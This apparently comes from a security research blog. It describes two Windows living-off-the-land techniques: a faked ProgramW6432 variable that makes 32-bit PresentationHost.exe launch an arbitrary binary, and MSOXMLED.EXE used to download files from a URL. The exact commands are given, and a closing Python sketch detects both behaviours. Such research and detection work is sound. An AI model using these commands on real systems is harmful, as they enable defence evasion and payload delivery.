Misre-presentation host

February 8, 2021 in Living off the land, LOLBins

PresentationHost.exe is a known LOLBIN so I approached it with caution.

To my surprise, I discovered that it accepts a number of command line arguments:

  • Embedding – running as a server (?)
  • Debug – enables debugging (see next point)
  • DebugSecurityZoneURL – specifies XBAP URL used for debugging as per this old article
  • Event – ?
  • LaunchApplication – launch ClickOnce application
  • RegServer – registers server
  • UnregServer – unregisters server

Apart from DebugSecurityZoneURL, which may be useful in some scenarios, my attention focused on LaunchApplication. Not because it can launch a ClickOnce application, but because it… launches iexplore.exe if it cannot find anything to launch.

And as it turns out, it relies on an environment variable value while resolving the path to iexplore.exe. In certain configurations (32-bit presentationhost.exe executed in a 64-bit environment) it allows us to launch an application of our choice. That is, a new lolbin is born.

If we fake the value of ProgramW6432

set ProgramW6432=c:\test

and then launch

c:\windows\syswow64\PresentationHost.exe foo

it will attempt to launch Internet Explorer\IEXPLORE.EXE from the folder ProgramW6432 refers to, e.g. c:\test\Internet Explorer\IEXPLORE.EXE.

As a side note, I am providing a copy of the article I referred to just in case it disappears from web.archive.org:

Desperate downloader lolbin

February 5, 2021 in LOLBins

I was toying around with the Office application MSOXMLED.EXE and noticed it handles URLs. Thanks to that, it can be used to download a file to the internet cache folder as shown below:

There are at least two different ways to invoke it:

MSOXMLED.EXE /verb open [URL]
MSOXMLED.EXE /verb [anything] /genverb open [URL]

and the file is being downloaded to the InetCache folder:

c:\Users\[user]\AppData\Local\Microsoft\Windows\INetCache\Low\IE\[random]\[file]

The caveat is that it seems to be using Internet Explorer as a proxy, hence iexplore.exe will be spawned. As such it doesn’t work on systems where IE is removed (thx to @NathanMcNulty for confirming this and reminding me about two different paths below).

The actual MSOXMLED.EXE binary is located in these two places (64- and 32-bit version):

  • c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE
  • c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLED.EXE

For anyone wondering,

MSOXMLED.EXE /verb open file://c:\windows\notepad.exe

does work, but we get the dialog box below (rendering this technique useless):

It could possibly work with some Registry tweaking, but I have not invested time in checking it yet. Another option could be adding another extension handler.

Lame, not very ‘finesse’, but at least documented.
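
For anyone wanting to hunt for both behaviours described in the two posts above, here is an added detection sketch (not code from this blog) that classifies process-creation events. The event field names, the default Internet Explorer directories on a C: system drive, and iexplore.exe appearing as a direct child of PresentationHost.exe are assumptions, and the sample events are constructed.

```python
import ntpath
import re

# Assumption: Windows on C:, Internet Explorer in its default directories.
EXPECTED_IE_DIRS = {
    r"c:\program files\internet explorer",
    r"c:\program files (x86)\internet explorer",
}
VERB_RE = re.compile(r"/(?:gen)?verb\s+open\b", re.IGNORECASE)
URL_RE = re.compile(r"\b[a-z][a-z0-9+.\-]*://\S+", re.IGNORECASE)


def classify(event):
    """Return a finding name for one process-creation event, or None."""
    image = ntpath.normpath(event["image"]).lower()
    name = ntpath.basename(image)
    parent_name = ntpath.basename(event["parent_image"]).lower()

    # First post: the IEXPLORE.EXE path is built from ProgramW6432, so a child
    # outside the default IE directories suggests the variable was changed.
    if parent_name == "presentationhost.exe" and name == "iexplore.exe":
        if ntpath.dirname(image) not in EXPECTED_IE_DIRS:
            return "iexplore-outside-default-dir"

    # Second post: MSOXMLED.EXE with "/verb open" or "/genverb open" and a URL.
    cmdline = event["command_line"]
    if name == "msoxmled.exe" and VERB_RE.search(cmdline) and URL_RE.search(cmdline):
        return "msoxmled-open-url"
    return None


def ev(parent_image, image, command_line):
    """Build one constructed event; the field names are hypothetical."""
    return {"parent_image": parent_image, "image": image, "command_line": command_line}


PH = r"c:\windows\syswow64\PresentationHost.exe"
MSO = (r"c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64"
       r"\Microsoft Shared\OFFICE16\MSOXMLED.EXE")
SAMPLE_EVENTS = [  # constructed for illustration, not captured telemetry
    ev(PH, r"c:\test\Internet Explorer\IEXPLORE.EXE", "IEXPLORE.EXE"),
    ev(PH, r"C:\Program Files\Internet Explorer\iexplore.exe", "iexplore.exe"),
    ev(r"c:\windows\system32\cmd.exe", MSO, "MSOXMLED.EXE /verb open http://example.test/a.bin"),
    ev(r"c:\windows\system32\cmd.exe", MSO, "MSOXMLED.EXE /verb x /genverb open http://example.test/a.bin"),
    ev(r"c:\windows\explorer.exe", MSO, r'MSOXMLED.EXE /verb open "C:\Users\user\data.xml"'),
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(classify(e), "<-", e["image"])
```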